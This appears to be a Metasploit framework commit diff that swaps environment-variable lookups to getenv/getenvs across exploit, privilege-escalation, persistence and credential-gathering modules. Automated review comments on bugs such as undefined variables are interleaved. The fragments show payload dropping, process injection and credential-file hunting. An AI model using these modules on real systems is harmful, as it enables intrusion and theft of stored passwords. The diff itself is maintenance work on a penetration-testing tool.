@@ -74,13 +74,11 @@ class Metasploit3 < Msf::Exploit::Remote def on_new_session(session) if session.type == "meterpreter" session.core.use("stdapi") unless session.ext.aliases.include?("stdapi") - end - @dropped_files.each do |file| - win_file = file.gsub("/", "\\\\") - if session.type == "meterpreter" + @dropped_files.each do |file| + win_file = file.gsub("/", "\\\\") begin - wintemp = session.fs.file.expand_path("%WINDIR%") + wintemp = session.sys.config.getenv('WINDIR') win_file = "#{wintemp}\\Temp\\#{win_file}" # Meterpreter should do this automatically as part of # fs.file.rm(). Until that has been implemented, remove the @@ -93,7 +91,6 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Failed to delete #{win_file}") false end - end end @@ -169,4 +166,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end \ No newline at end of file +end diff --git a/modules/exploits/windows/browser/notes_handler_cmdinject.rb b/modules/exploits/windows/browser/notes_handler_cmdinject.rb index a32c3f9348..474efd2f79 100644 --- a/modules/exploits/windows/browser/notes_handler_cmdinject.rb +++ b/modules/exploits/windows/browser/notes_handler_cmdinject.rb @@ -72,13 +72,11 @@ class Metasploit3 < Msf::Exploit::Remote def on_new_session(session) if session.type == "meterpreter" session.core.use("stdapi") unless session.ext.aliases.include?("stdapi") - end - @dropped_files.delete_if do |file| - win_file = file.gsub("/", "\\\\") - if session.type == "meterpreter" + @dropped_files.delete_if do |file| + win_file = file.gsub("/", "\\\\") begin - wintemp = session.fs.file.expand_path("%TEMP%") + wintemp = session.sys.config.getenv('TEMP') win_file = "#{wintemp}\\#{win_file}" # Meterpreter should do this automatically as part of # fs.file.rm(). Until that has been implemented, remove the @@ -91,7 +89,6 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Failed to delete #{win_file}") false end - end end 
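Review bot: In `honeywell_tema_exec.rb` the cleanup loop is `@dropped_files.each`, not the `delete_if` its sibling modules in this commit use, so the `false` returned from the `rescue` arm (and the implicit value on success) is discarded and files that fail to delete are neither reported as remaining nor removed from the list; either switch to `@dropped_files.delete_if do |file|` or drop the dead `false`. As with the other modules, a nil from `getenv('WINDIR')` would turn the path into `\Temp\...`, so a nil check before `win_file` is built is worth adding. `on_new_session` continues outside the hunk.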
@@ -184,4 +181,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end \ No newline at end of file +end diff --git a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb index b1618c0aaf..55be42c401 100644 --- a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb +++ b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb @@ -66,13 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote def on_new_session(session) if session.type == "meterpreter" session.core.use("stdapi") unless session.ext.aliases.include?("stdapi") - end - @dropped_files.delete_if do |file| - win_file = file.gsub("/", "\\\\") - if session.type == "meterpreter" + @dropped_files.delete_if do |file| + win_file = file.gsub("/", "\\\\") begin - wintemp = session.fs.file.expand_path("%TEMP%") + wintemp = session.sys.config.getenv('TEMP') win_file = "#{wintemp}\\#{win_file}" session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|) session.fs.file.rm(win_file) @@ -82,7 +80,6 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Failed to delete #{win_file}") false end - end end end @@ -257,4 +254,4 @@ This code allows to launch other executables with user data provided as argument solution because it allows to pass URL's as arguments. And code executed by mshta is on a privileged zone. Other executables allow to provide SMB URI's but metasploit only allow to 'simulate' a SMB resource through webdav, so the target should have the WebClient service enabled, which is only enabled by default on XP SP3. -=end \ No newline at end of file +=end diff --git a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb index 45dbf51476..bc072cbaa6 100644 --- a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb +++ b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb 
@@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote # Use the system path for executable to run except the wordpad if client.sys.config.sysinfo["OS"] =~ /Windows XP/ - windir = client.fs.file.expand_path("%ProgramFiles%") + windir = client.sys.config.getenv('ProgramFiles') cmd="#{windir}\\Windows NT\\Accessories\\wordpad.exe" else # Windows 2000 cmd = "notepad.exe" diff --git a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb index 5bc2afeae6..afc65e9246 100644 --- a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb +++ b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local # Usint this solution atm because I'm experiencing problems with railgun when trying # use GetTokenInformation def low_integrity_level? - tmp_dir = expand_path("%TEMP%") + tmp_dir = session.sys.config.getenv('TEMP') cd(tmp_dir) new_dir = "#{rand_text_alpha(5)}" begin diff --git a/modules/exploits/windows/local/agnitum_outpost_acs.rb b/modules/exploits/windows/local/agnitum_outpost_acs.rb index e6a48947bc..8d0a442e2a 100644 --- a/modules/exploits/windows/local/agnitum_outpost_acs.rb +++ b/modules/exploits/windows/local/agnitum_outpost_acs.rb @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Local if datastore["WritableDir"] and not datastore["WritableDir"].empty? temp_dir = datastore["WritableDir"] else - temp_dir = expand_path("%TEMP%") + temp_dir = client.sys.config.getenv('TEMP') end print_status("Using #{temp_dir} to drop malicious DLL...") diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb index 93e282aabf..01482ce127 100644 --- a/modules/exploits/windows/local/ask.rb +++ b/modules/exploits/windows/local/ask.rb 
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Local if datastore["PATH"] payload_path = datastore["PATH"] else - payload_path = session.fs.file.expand_path("%TEMP%") + payload_path = session.sys.config.getenv('TEMP') end cmd_location = "#{payload_path}\\#{payload_filename}" diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb index a9c0103521..8c59d96585 100644 --- a/modules/exploits/windows/local/bypassuac.rb +++ b/modules/exploits/windows/local/bypassuac.rb @@ -42,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Local end - def check_permissions! # Check if you are an admin vprint_status('Checking admin status...') diff --git a/modules/exploits/windows/local/current_user_psexec.rb b/modules/exploits/windows/local/current_user_psexec.rb index a89fc57d3c..c8f090f42c 100644 --- a/modules/exploits/windows/local/current_user_psexec.rb +++ b/modules/exploits/windows/local/current_user_psexec.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local # Build a random name for the share and directory share_name = Rex::Text.rand_text_alphanumeric(8) - drive = session.fs.file.expand_path("%SYSTEMDRIVE%") + drive = session.sys.config.getenv('SYSTEMDRIVE') share_dir = "#{drive}\\#{share_name}" # Create them diff --git a/modules/exploits/windows/local/ms10_092_schelevator.rb b/modules/exploits/windows/local/ms10_092_schelevator.rb index 8628be003b..840c47a0cf 100644 --- a/modules/exploits/windows/local/ms10_092_schelevator.rb +++ b/modules/exploits/windows/local/ms10_092_schelevator.rb @@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Local cmd = datastore["CMD"] || nil upload_fn = nil - tempdir = session.fs.file.expand_path("%TEMP%") + tempdir = session.sys.config.getenv('TEMP') if not cmd # Get the exe payload. exe = generate_payload_exe 
@@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Local # Create a new task to do our bidding, but make sure it doesn't run. # taskname ||= Rex::Text.rand_text_alphanumeric(8+rand(8)) - sysdir = session.fs.file.expand_path("%SystemRoot%") + sysdir = session.sys.config.getenv('SystemRoot') taskfile = "#{sysdir}\\system32\\tasks\\#{taskname}" print_status("Creating task: #{taskname}") diff --git a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb index 92f2e46e3c..6a3e1d215c 100644 --- a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb +++ b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Local end def low_integrity_level? - tmp_dir = expand_path("%USERPROFILE%") + tmp_dir = session.sys.config.getenv('USERPROFILE') cd(tmp_dir) new_dir = "#{rand_text_alpha(5)}" begin @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Local if datastore['TECHNIQUE'] == 'FILE' payload_file = "#{rand_text_alpha(5+rand(3))}.exe" begin - tmp_dir = expand_path("%TEMP%") + tmp_dir = session.sys.config.getenv('TEMP') tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i cd(tmp_dir) print_status("Trying to drop payload to #{tmp_dir}...") @@ -186,7 +186,7 @@ class Metasploit3 < Msf::Exploit::Local # Spawn low integrity cmd.exe print_status("Spawning Low Integrity Cmd Prompt") - windir = client.fs.file.expand_path("%windir%") + windir = session.sys.config.getenv('windir') li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid count = count_cmd_procs diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb index cef0f217a2..54ad50127b 100644 --- a/modules/exploits/windows/local/ms_ndproxy.rb +++ b/modules/exploits/windows/local/ms_ndproxy.rb 
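Review bot: In `ms13_005_hwnd_broadcast.rb`, `tmp_dir << "\\Low"` appends in place to the string returned by `session.sys.config.getenv('TEMP')`; if the client ever caches or reuses that value (not visible here) later callers would see a `...\Low` path, and a nil return raises `NoMethodError` on the `tmp_dir[-3,3]` check rather than a clear error. `tmp_dir = "#{tmp_dir}\\Low" unless tmp_dir[-3,3] =~ /Low/i` keeps the same test without mutating the returned object. The `@@ -186,7` hunk mixes `session.sys.config.getenv` with `client.sys.process.execute` on adjacent lines; the receivers appear interchangeable in this class, but one spelling would read better. All three hunks sit inside methods whose bodies extend beyond what is shown.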
@@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Local end def create_proc - windir = expand_path("%windir%") + windir = session.sys.config.getenv('windir') cmd = "#{windir}\\System32\\notepad.exe" # run hidden begin diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb index 5e4c70798b..e79fb0c096 100644 --- a/modules/exploits/windows/local/nvidia_nvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb @@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Local print_status("Launching notepad to host the exploit...") - windir = expand_path("%windir%") + windir = session.sys.config.getenv('windir') cmd = "#{windir}\\SysWOW64\\notepad.exe" process = client.sys.process.execute(cmd, nil, {'Hidden' => true}) host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS) diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb index 655e2ae244..0b7a26f357 100644 --- a/modules/exploits/windows/local/payload_inject.rb +++ b/modules/exploits/windows/local/payload_inject.rb @@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Local # Creates a temp notepad.exe to inject payload in to given the payload # Returns process PID def create_temp_proc() - windir = client.fs.file.expand_path("%windir%") + windir = client.sys.config.getenv('windir') # Select path of executable to run depending the architecture if @payload_arch.first== "x86" and client.platform =~ /x86/ cmd = "#{windir}\\System32\\notepad.exe" diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index 811b1190a3..9ce47a82fc 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb 
@@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Local # Writes script to target host def write_script_to_target(vbs,name) - tempdir = expand_path("%TEMP%") + tempdir = session.sys.config.getenv('TEMP') if name == nil tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs" else diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb index 264f3e991e..5fc33f62a6 100644 --- a/modules/exploits/windows/local/ppr_flatten_rec.rb +++ b/modules/exploits/windows/local/ppr_flatten_rec.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Local def check os = sysinfo["OS"] if os =~ /windows/i - file_path = expand_path("%windir%") << "\\system32\\win32k.sys" + file_path = session.sys.config.getenv('windir') << "\\system32\\win32k.sys" major, minor, build, revision, branch = file_version(file_path) vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision}") diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index 7572b24d1a..07df848e19 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Local # Returns path for XML and payload def generate_path(rexename) # Generate a path to write payload and XML - path = datastore['PATH'] || expand_path("%TEMP%") + path = datastore['PATH'] || session.sys.config.getenv('TEMP') xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml" rexe_path = "#{path}\\#{rexename}" return xml_path,rexe_path diff --git a/modules/exploits/windows/local/service_permissions.rb b/modules/exploits/windows/local/service_permissions.rb index 98e3490a9d..49e5938474 100644 --- a/modules/exploits/windows/local/service_permissions.rb +++ b/modules/exploits/windows/local/service_permissions.rb 
@@ -59,8 +59,9 @@ class Metasploit3 < Msf::Exploit::Local exe = Msf::Util::EXE.to_win32pe_service(session.framework, raw) - sysdir = session.fs.file.expand_path("%SystemRoot%") - tmpdir = session.fs.file.expand_path("%TEMP%") + dir_env = session.sys.config.getenvs('SystemRoot', 'TEMP') + sysdir = dir_env['SystemRoot'] + tmpdir = dir_env['TEMP'] print_status("Meterpreter stager executable #{exe.length} bytes long being uploaded..") begin @@ -122,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Local moved = false configed = false #default path, but there should be an ImagePath registry key - source = session.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe") + source = "#{sysdir}\\system32\\#{serv}.exe" #get path to exe; parse out quotes and arguments sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s sourcemaybe = session.fs.file.expand_path(sourceorig) diff --git a/modules/exploits/windows/misc/altiris_ds_sqli.rb b/modules/exploits/windows/misc/altiris_ds_sqli.rb index 9d9b612caf..7d62ff1bee 100644 --- a/modules/exploits/windows/misc/altiris_ds_sqli.rb +++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb @@ -190,7 +190,7 @@ Processor-Speed=#{processor_speed} end end - win_temp = client.fs.file.expand_path("%TEMP%") + win_temp = client.sys.config.getenv('TEMP') win_file = "#{win_temp}\\#{payload_exe}" print_status("Attempting to delete #{win_file} ...") client.shell_command_token(%Q|attrib.exe -r #{win_file}|) diff --git a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb index 8365e94ac2..7f485d3c94 100644 --- a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb +++ b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb 
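Review bot: In the second service_permissions.rb hunk the new `source = "#{sysdir}\\system32\\#{serv}.exe"` relies on the `sysdir` local that the first hunk assigns from `getenvs` some sixty lines earlier, and both sit in a method whose start and end are outside the diff. If the assignment and this use are not in the same method, or `sysdir` is reassigned in between, the result is a NameError rather than merely a wrong path, so please confirm the two are in one scope or re-fetch it at the point of use: `source = "#{session.sys.config.getenv('SystemRoot')}\\system32\\#{serv}.exe"`. Leaving `sourcemaybe = session.fs.file.expand_path(sourceorig)` on the following line is right, since an ImagePath value may itself embed `%SystemRoot%`.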
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote begin print_good("Deleting the VBS payload \"#{@var_vbs_name}.vbs\" ...") - windir = client.fs.file.expand_path("%WINDIR%") + windir = client.sys.config.getenv('WINDIR') client.fs.file.rm("#{windir}\\system32\\" + @var_vbs_name + ".vbs") print_good("Deleting the MOF file \"#{@var_mof_name}.mof\" ...") cmd = "#{windir}\\system32\\attrib.exe -r " + diff --git a/modules/exploits/windows/novell/netiq_pum_eval.rb b/modules/exploits/windows/novell/netiq_pum_eval.rb index 238b71aef4..652c37be25 100644 --- a/modules/exploits/windows/novell/netiq_pum_eval.rb +++ b/modules/exploits/windows/novell/netiq_pum_eval.rb @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote win_file = file.gsub("/", "\\\\") if session.type == "meterpreter" begin - windir = session.fs.file.expand_path("%WINDIR%") + windir = session.sys.config.getenv('WINDIR') win_file = "#{windir}\\system32\\#{win_file}" # Meterpreter should do this automatically as part of # fs.file.rm(). Until that has been implemented, remove the diff --git a/modules/post/linux/manage/download_exec.rb b/modules/post/linux/manage/download_exec.rb index c1470ed799..71dd963b7f 100644 --- a/modules/post/linux/manage/download_exec.rb +++ b/modules/post/linux/manage/download_exec.rb @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Post end def exists_exe?(exe) - path = expand_path("$PATH") + path = session.sys.config.getenv("PATH") if path.nil? or path.empty? return false end diff --git a/modules/post/multi/gather/apple_ios_backup.rb b/modules/post/multi/gather/apple_ios_backup.rb index 9691aeb2e4..dd6771d393 100644 --- a/modules/post/multi/gather/apple_ios_backup.rb +++ b/modules/post/multi/gather/apple_ios_backup.rb 
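Review bot: `path = session.sys.config.getenv("PATH")` in `exists_exe?` of the Linux download_exec post module is a Meterpreter-only API, whereas the replaced `expand_path("$PATH")` came from the Post::File mixin and also worked on plain shell sessions, which are the usual case for Linux posts; on a shell session `session.sys` raises NoMethodError before the `nil?`/`empty?` guard is reached. Unless the module's SessionTypes were narrowed to meterpreter (not visible here), keep the mixin call, or branch: `path = session.type == 'meterpreter' ? session.sys.config.getenv('PATH') : cmd_exec('echo $PATH')`. Whether the Linux Meterpreter of this vintage implements getenvs at all is also not established by the diff, so the shell fallback is worth keeping in either case.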
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post paths = enum_users_unix when /win/ @platform = :windows - drive = session.fs.file.expand_path("%SystemDrive%") + drive = session.sys.config.getenv('SystemDrive') os = session.sys.config.sysinfo['OS'] if os =~ /Windows 7|Vista|2008/ @@ -265,7 +265,7 @@ class Metasploit3 < Msf::Post def whoami if @platform == :windows - session.fs.file.expand_path("%USERNAME%") + session.sys.config.getenv('USERNAME') else session.shell_command("whoami").chomp end diff --git a/modules/post/multi/gather/env.rb b/modules/post/multi/gather/env.rb index 0e138c3680..c7efcf42d5 100644 --- a/modules/post/multi/gather/env.rb +++ b/modules/post/multi/gather/env.rb @@ -54,9 +54,8 @@ class Metasploit3 < Msf::Post var_names << registry_enumvals("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment") output = [] var_names.delete(nil) - var_names.flatten.uniq.sort.each do |v| - # Emulate the output of set and env, e.g. VAR=VALUE - output << "#{v}=#{session.fs.file.expand_path("\%#{v}\%")}" + session.sys.config.getenvs(*var_names.flatten.uniq.sort).each do |k, v| + output << "#{k}=#{v}" end @output = output.join("\n") @ltype = "windows.environment" diff --git a/modules/post/multi/gather/filezilla_client_cred.rb b/modules/post/multi/gather/filezilla_client_cred.rb index 85f85f7e17..f9c6b9cf58 100644 --- a/modules/post/multi/gather/filezilla_client_cred.rb +++ b/modules/post/multi/gather/filezilla_client_cred.rb @@ -240,7 +240,7 @@ class Metasploit3 < Msf::Post def whoami if @platform == :windows - session.fs.file.expand_path("%USERNAME%") + session.sys.config.getenv('USERNAME') else session.shell_command("whoami").chomp end diff --git a/modules/post/multi/gather/firefox_creds.rb b/modules/post/multi/gather/firefox_creds.rb index 1c7fd888e7..0b39193458 100644 --- a/modules/post/multi/gather/firefox_creds.rb +++ b/modules/post/multi/gather/firefox_creds.rb 
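Review bot: In the env.rb hunk the rewritten loop walks the Hash returned by `getenvs` in whatever order the response carries, so the `.sort` applied to the request no longer guarantees sorted `VAR=VALUE` output the way the old per-name loop did; sort the result instead, `session.sys.config.getenvs(*var_names.flatten.uniq.sort).sort.each do |k, v|`. Separately, `var_names.delete(nil)` runs before `flatten`, so a nil inside one of the arrays returned by `registry_enumvals` would now be handed to `getenvs` as a variable name; `var_names.flatten.compact.uniq.sort` closes that. The enclosing method starts outside the hunk.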
@@ -277,7 +277,6 @@ class Metasploit3 < Msf::Post def get_ff_and_loot_path @paths = {} check_paths = [] - drive = expand_path("%SystemDrive%") loot_file = Rex::Text::rand_text_alpha(6) + ".txt" case @platform @@ -286,7 +285,9 @@ class Metasploit3 < Msf::Post print_error("You need root privileges on this platform for DECRYPT option") return false end - tmpdir = expand_path("%TEMP%") + "\\" + env_vars = session.sys.config.getenvs('TEMP', 'SystemDrive') + tmpdir = env_vars['TEMP'] + "\\" + drive = env_vars['SystemDrive'] # this way allows for more independent use of meterpreter # payload (32 and 64 bit) and cleaner code check_paths << drive + '\\Program Files\\Mozilla Firefox\\' @@ -643,9 +644,9 @@ class Metasploit3 < Msf::Post def whoami if @platform == :windows - return session.fs.file.expand_path("%USERNAME%") + session.sys.config.getenv('USERNAME') else - return session.shell_command("whoami").chomp + session.shell_command("whoami").chomp end end end diff --git a/modules/post/multi/gather/pidgin_cred.rb b/modules/post/multi/gather/pidgin_cred.rb index 66bce0a72c..3f5974cb64 100644 --- a/modules/post/multi/gather/pidgin_cred.rb +++ b/modules/post/multi/gather/pidgin_cred.rb @@ -307,7 +307,7 @@ class Metasploit3 < Msf::Post def whoami if @platform == :windows - session.fs.file.expand_path("%USERNAME%") + session.sys.config.getenv('USERNAME') else session.shell_command("whoami").chomp end diff --git a/modules/post/multi/gather/thunderbird_creds.rb b/modules/post/multi/gather/thunderbird_creds.rb index 07ff62c480..5f36dcb138 100644 --- a/modules/post/multi/gather/thunderbird_creds.rb +++ b/modules/post/multi/gather/thunderbird_creds.rb @@ -50,7 +50,7 @@ class Metasploit3 < Msf::Post base = "/Users/#{user}/Library/Thunderbird/Profiles/" when /win/ if session.type =~ /meterpreter/ - user_profile = session.fs.file.expand_path("%APPDATA%") + user_profile = session.sys.config.getenv('APPDATA') else user_profile = cmd_exec("echo %APPDATA%").strip end 
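Review bot: In firefox_creds.rb `drive` was assigned unconditionally at the top of `get_ff_and_loot_path` and is now set only inside the branch that follows the root-privilege check, so any other `case @platform` branch that builds its `check_paths` from `drive` would hit an undefined local (a NameError, since the first assignment is what declares it in Ruby). Whether another branch uses it cannot be confirmed from the hunk; if one does, restore the assignment before the `case`: `drive = session.sys.config.getenv('SystemDrive')`. The `whoami` change from explicit `return` to implicit is fine.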
diff --git a/modules/post/windows/escalate/ms10_073_kbdlayout.rb b/modules/post/windows/escalate/ms10_073_kbdlayout.rb index a3f7a1c3cb..38e2a691bb 100644 --- a/modules/post/windows/escalate/ms10_073_kbdlayout.rb +++ b/modules/post/windows/escalate/ms10_073_kbdlayout.rb @@ -176,7 +176,7 @@ EOS ring0_code.gsub!('TPTP', [pid].pack('V')) # Create the malicious Keyboard Layout file... - tmpdir = session.fs.file.expand_path("%TEMP%") + tmpdir = session.sys.config.getenv('TEMP') fname = "p0wns.boom" dllpath = "#{tmpdir}\\#{fname}" fd = session.fs.file.new(dllpath, 'wb') diff --git a/modules/post/windows/escalate/net_runtime_modify.rb b/modules/post/windows/escalate/net_runtime_modify.rb index ee8fdd957c..4f71b271c1 100644 --- a/modules/post/windows/escalate/net_runtime_modify.rb +++ b/modules/post/windows/escalate/net_runtime_modify.rb @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Post paths = [] services = [] vuln = "" - @temp = session.fs.file.expand_path("%TEMP%") + @temp = session.sys.config.getenv('TEMP') if init_railgun() == :error return diff --git a/modules/post/windows/gather/credentials/bulletproof_ftp.rb b/modules/post/windows/gather/credentials/bulletproof_ftp.rb index 11f2db0653..fb253f037c 100644 --- a/modules/post/windows/gather/credentials/bulletproof_ftp.rb +++ b/modules/post/windows/gather/credentials/bulletproof_ftp.rb 
@@ -233,12 +233,14 @@ class Metasploit3 < Msf::Post print_status("Searching BulletProof FTP Client installation directory...") # BulletProof FTP Client 2.6 uses the installation dir to store bookmarks files - program_files_x86 = expand_path('%ProgramFiles(X86)%') - if not program_files_x86.empty? and program_files_x86 !~ /%ProgramFiles\(X86\)%/ - program_files = program_files_x86 #x64 + progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles') + progfilesx86 = prog_files_env['ProgramFiles(X86)'] + if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/ + program_files = progfilesx86 # x64 else - program_files = expand_path('%ProgramFiles%') #x86 + program_files = progfiles_env['ProgramFiles'] # x86 end + session.fs.dir.foreach(program_files) do |dir| if dir =~ /BulletProof FTP Client/ vprint_status("BulletProof Installation directory found at #{program_files}\\#{dir}") diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb index ea254450da..e562129d68 100644 --- a/modules/post/windows/gather/credentials/filezilla_server.rb +++ b/modules/post/windows/gather/credentials/filezilla_server.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post return end - drive = session.fs.file.expand_path("%SystemDrive%") + drive = session.sys.config.getenv('SystemDrive') case session.platform when /win64/i @progs = drive + '\\Program Files (x86)\\' @@ -360,6 +360,6 @@ class Metasploit3 < Msf::Post end def whoami - return session.fs.file.expand_path("%USERNAME%") + return session.sys.config.getenv('USERNAME') end end diff --git a/modules/post/windows/gather/credentials/steam.rb b/modules/post/windows/gather/credentials/steam.rb index e5f045fd59..9a0fafa782 100644 --- a/modules/post/windows/gather/credentials/steam.rb +++ b/modules/post/windows/gather/credentials/steam.rb 
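Review bot: `progfilesx86 = prog_files_env['ProgramFiles(X86)']` in bulletproof_ftp.rb reads a variable that is never assigned — the line above stores the hash in `progfiles_env` — so this path raises NameError as soon as it runs; the fix is `progfilesx86 = progfiles_env['ProgramFiles(X86)']`. The kept `!~ /%ProgramFiles\(X86\)%/` test existed because expand_path echoed the unexpanded name back on x86 hosts; getenvs will not do that, and if it yields nil for an undefined variable the `.empty?` call fails, so `if progfilesx86 && !progfilesx86.empty?` (or `.blank?`) is the condition that matches the new API. The enclosing method continues outside the hunk.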
@@ -40,10 +40,12 @@ class Metasploit3 < Msf::Post # Steam client is only 32 bit so we need to know what arch we are on so that we can use # the correct program files folder. # We will just use an x64 only defined env variable to check. - if not expand_path('%ProgramFiles(X86)%').empty? and expand_path('%ProgramFiles(X86)%') !~ /%ProgramFiles\(X86\)%/ - progs = expand_path('%ProgramFiles(X86)%') #x64 + progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles') + progfilesx86 = prog_files_env['ProgramFiles(X86)'] + if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/ + progs = progfilesx86 # x64 else - progs = expand_path('%ProgramFiles%') #x86 + progs = progfiles_env['ProgramFiles'] # x86 end path = progs + '\\Steam\\config' diff --git a/modules/post/windows/gather/credentials/tortoisesvn.rb b/modules/post/windows/gather/credentials/tortoisesvn.rb index bca7b022b6..3a30aae1d3 100644 --- a/modules/post/windows/gather/credentials/tortoisesvn.rb +++ b/modules/post/windows/gather/credentials/tortoisesvn.rb @@ -103,8 +103,7 @@ class Metasploit3 < Msf::Post def get_config_files # Determine if TortoiseSVN is installed and parse config files savedpwds = 0 - user_appdata = session.fs.file.expand_path("%APPDATA%") - path = user_appdata + '\\Subversion\\auth\\svn.simple\\' + path = session.fs.file.expand_path("%APPDATA%\\Subversion\\auth\\svn.simple\\") print_status("Checking for configuration files in: #{path}") begin diff --git a/modules/post/windows/gather/credentials/total_commander.rb b/modules/post/windows/gather/credentials/total_commander.rb index 20f506fba8..3b91655a30 100644 --- a/modules/post/windows/gather/credentials/total_commander.rb +++ b/modules/post/windows/gather/credentials/total_commander.rb @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Post end def check_systemroot - winpath = expand_path("%SYSTEMROOT%")+'\\wcx_ftp.ini' + winpath = expand_path("%SYSTEMROOT%\\wcx_ftp.ini") check_other(winpath) end 
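Review bot: `progfilesx86 = prog_files_env['ProgramFiles(X86)']` in steam.rb references an undefined local — the hash is assigned to `progfiles_env` on the preceding line — so the module raises NameError before reaching `path = progs + '\\Steam\\config'`; change it to `progfilesx86 = progfiles_env['ProgramFiles(X86)']`. With getenvs a missing `ProgramFiles(X86)` on an x86 host presumably comes back as nil rather than the literal `%ProgramFiles(X86)%`, so the `.empty?` call and the regex both need replacing by a nil-safe guard such as `if progfilesx86 && !progfilesx86.empty?`. The enclosing method starts and ends outside the hunk.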
diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index 953348cb82..c728cc4e0d 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -98,11 +98,15 @@ class Metasploit3 < Msf::Post locations = [] #Checks - locations << {:name => 'UltraVNC', - :check_file => session.fs.file.expand_path("%PROGRAMFILES%")+'\\UltraVNC\\ultravnc.ini', - :pass_variable => 'passwd=', - :viewonly_variable => 'passwd2=', - :port_variable => 'PortNumber='} + progfiles_env = session.sys.config.getenvs('ProgramFiles', 'ProgramFiles(x86)') + progfiles_env.each do |k, v| + next if v.blank? + locations << {:name => 'UltraVNC', + :check_file => "#{v}\\UltraVNC\\ultravnc.ini", + :pass_variable => 'passwd=', + :viewonly_variable => 'passwd2=', + :port_variable => 'PortNumber='} + end locations << {:name => 'WinVNC3_HKLM', :check_reg => 'HKLM\\Software\\ORL\\WinVNC3', diff --git a/modules/post/windows/gather/credentials/winscp.rb 